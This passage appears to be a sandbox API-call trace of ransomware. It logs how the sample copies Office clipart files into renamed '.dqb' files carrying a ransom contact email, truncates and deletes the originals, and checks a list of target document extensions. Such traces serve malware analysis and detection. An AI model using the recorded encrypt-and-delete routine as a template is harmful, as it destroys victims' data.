nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x3f34, lpOverlapped=0x0) returned 1 [0053.511] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x3f40, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x3f40, lpOverlapped=0x0) returned 1 [0053.513] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.513] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.513] SetEndOfFile (hFile=0x234) returned 1 [0053.513] CloseHandle (hObject=0x234) returned 1 [0053.513] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.513] SetEndOfFile (hFile=0x218) returned 1 [0053.514] CloseHandle (hObject=0x218) returned 1 [0053.514] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.514] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf")) returned 1 [0053.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.514] lstrlenW (lpString=".doc") returned 4 [0053.514] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.514] lstrlenW (lpString=".docx") returned 5 [0053.514] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.514] lstrlenW (lpString=".pdf") returned 4 [0053.514] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.515] lstrlenW (lpString=".xls") returned 4 [0053.515] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.515] lstrlenW (lpString=".xlsx") returned 5 [0053.515] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.515] lstrlenW (lpString=".ppt") returned 4 [0053.515] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.515] lstrlenW (lpString=".zip") returned 4 [0053.515] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.515] lstrlenW (lpString=".rar") returned 4 [0053.515] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.515] lstrlenW (lpString=".bz2") returned 4 [0053.515] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.515] lstrlenW (lpString=".7z") returned 3 [0053.515] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.515] lstrlenW (lpString=".dbf") returned 4 [0053.515] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.515] lstrlenW (lpString=".1cd") returned 4 [0053.515] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0053.515] lstrlenW (lpString=".jpg") returned 4 [0053.515] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.515] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.515] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.516] GetLastError () returned 0x0 [0053.516] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x4354, lpOverlapped=0x0) returned 1 [0053.518] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x4360, lpOverlapped=0x0) returned 1 [0053.519] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.519] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.519] SetEndOfFile (hFile=0x234) returned 1 [0053.519] CloseHandle (hObject=0x234) returned 1 [0053.519] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.519] SetEndOfFile (hFile=0x218) returned 1 [0053.520] CloseHandle (hObject=0x218) returned 1 [0053.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.520] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf")) returned 1 [0053.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.521] lstrlenW (lpString=".doc") returned 4 [0053.521] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.521] lstrlenW (lpString=".docx") returned 5 [0053.521] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.521] lstrlenW (lpString=".pdf") returned 4 [0053.521] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.521] lstrlenW (lpString=".xls") returned 4 [0053.521] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.521] lstrlenW (lpString=".xlsx") returned 5 [0053.521] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.521] lstrlenW (lpString=".ppt") returned 4 [0053.521] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.521] lstrlenW (lpString=".zip") returned 4 [0053.521] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.521] lstrlenW (lpString=".rar") returned 4 [0053.521] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.521] lstrlenW (lpString=".bz2") returned 4 [0053.521] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.521] lstrlenW (lpString=".7z") returned 3 [0053.521] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.521] lstrlenW (lpString=".dbf") returned 4 [0053.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.521] lstrlenW (lpString=".1cd") returned 4 [0053.521] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.521] lstrlenW (lpString=".jpg") returned 4 [0053.521] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.522] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.522] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.522] GetLastError () returned 0x0 [0053.522] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x3ef0, lpOverlapped=0x0) returned 1 [0053.646] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x3f00, lpOverlapped=0x0) returned 1 [0053.667] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.667] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.667] SetEndOfFile (hFile=0x234) returned 1 [0053.667] CloseHandle (hObject=0x234) returned 1 [0053.667] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.667] SetEndOfFile (hFile=0x218) returned 1 [0053.668] CloseHandle (hObject=0x218) returned 1 [0053.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.668] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf")) returned 1 [0053.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.669] lstrlenW (lpString=".doc") returned 4 [0053.669] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.669] lstrlenW (lpString=".docx") returned 5 [0053.669] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.669] lstrlenW (lpString=".pdf") returned 4 [0053.669] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.669] lstrlenW (lpString=".xls") returned 4 [0053.669] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.669] lstrlenW (lpString=".xlsx") returned 5 [0053.669] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.669] lstrlenW (lpString=".ppt") returned 4 [0053.669] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.669] lstrlenW (lpString=".zip") returned 4 [0053.669] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.669] lstrlenW (lpString=".rar") returned 4 [0053.669] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.669] lstrlenW (lpString=".bz2") returned 4 [0053.669] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.669] lstrlenW (lpString=".7z") returned 3 [0053.669] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.669] lstrlenW (lpString=".dbf") returned 4 [0053.669] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.669] lstrlenW (lpString=".1cd") returned 4 [0053.669] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0053.669] lstrlenW (lpString=".jpg") returned 4 [0053.669] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.670] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.670] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.670] GetLastError () returned 0x0 [0053.670] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x25ee, lpOverlapped=0x0) returned 1 [0053.672] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x25f0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x25f0, lpOverlapped=0x0) returned 1 [0053.673] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.673] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.673] SetEndOfFile (hFile=0x234) returned 1 [0053.673] CloseHandle (hObject=0x234) returned 1 [0053.673] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.673] SetEndOfFile (hFile=0x218) returned 1 [0053.674] CloseHandle (hObject=0x218) returned 1 [0053.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.674] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf")) returned 1 [0053.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0053.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0053.674] lstrlenW (lpString=".doc") returned 4 [0053.674] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.674] lstrlenW (lpString=".docx") returned 5 [0053.674] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.675] lstrlenW (lpString=".pdf") returned 4 [0053.675] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.675] lstrlenW (lpString=".xls") returned 4 [0053.675] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.675] lstrlenW (lpString=".xlsx") returned 5 [0053.675] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.675] lstrlenW (lpString=".ppt") returned 4 [0053.675] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0053.675] lstrlenW (lpString=".zip") returned 4 [0053.675] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.675] lstrlenW (lpString=".rar") returned 4 [0053.675] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.675] lstrlenW (lpString=".bz2") returned 4 [0053.675] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.675] lstrlenW (lpString=".7z") returned 3 [0053.675] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0053.675] lstrlenW (lpString=".dbf") returned 4 [0053.675] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0053.675] lstrlenW (lpString=".1cd") returned 4 [0053.675] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0053.675] lstrlenW (lpString=".jpg") returned 4 [0053.675] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.675] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=8772) returned 1 [0053.675] CloseHandle (hObject=0x218) returned 1 [0053.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf")) returned 0x20 [0053.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.676] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.676] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.677] GetLastError () returned 0x0 [0053.677] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x2244, lpOverlapped=0x0) returned 1 [0053.678] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x2250, lpOverlapped=0x0) returned 1 [0053.679] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.679] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.679] SetEndOfFile (hFile=0x234) returned 1 [0053.679] CloseHandle (hObject=0x234) returned 1 [0053.679] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.679] SetEndOfFile (hFile=0x218) returned 1 [0053.680] CloseHandle (hObject=0x218) returned 1 [0053.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.680] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf")) returned 1 [0053.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0053.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0053.681] lstrlenW (lpString=".doc") returned 4 [0053.681] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.681] lstrlenW (lpString=".docx") returned 5 [0053.681] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.681] lstrlenW (lpString=".pdf") returned 4 [0053.681] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.681] lstrlenW (lpString=".xls") returned 4 [0053.681] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.681] lstrlenW (lpString=".xlsx") returned 5 [0053.681] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.681] lstrlenW (lpString=".ppt") returned 4 [0053.681] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0053.681] lstrlenW (lpString=".zip") returned 4 [0053.681] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.681] lstrlenW (lpString=".rar") returned 4 [0053.681] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.681] lstrlenW (lpString=".bz2") returned 4 [0053.681] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.681] lstrlenW (lpString=".7z") returned 3 [0053.681] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0053.681] lstrlenW (lpString=".dbf") returned 4 [0053.681] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0053.681] lstrlenW (lpString=".1cd") returned 4 [0053.681] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0053.681] lstrlenW (lpString=".jpg") returned 4 [0053.681] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.682] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.682] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.682] GetLastError () returned 0x0 [0053.682] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x3896, lpOverlapped=0x0) returned 1 [0053.684] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x38a0, lpOverlapped=0x0) returned 1 [0053.685] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.685] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.685] SetEndOfFile (hFile=0x234) returned 1 [0053.685] CloseHandle (hObject=0x234) returned 1 [0053.685] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.685] SetEndOfFile (hFile=0x218) returned 1 [0053.686] CloseHandle (hObject=0x218) returned 1 [0053.686] 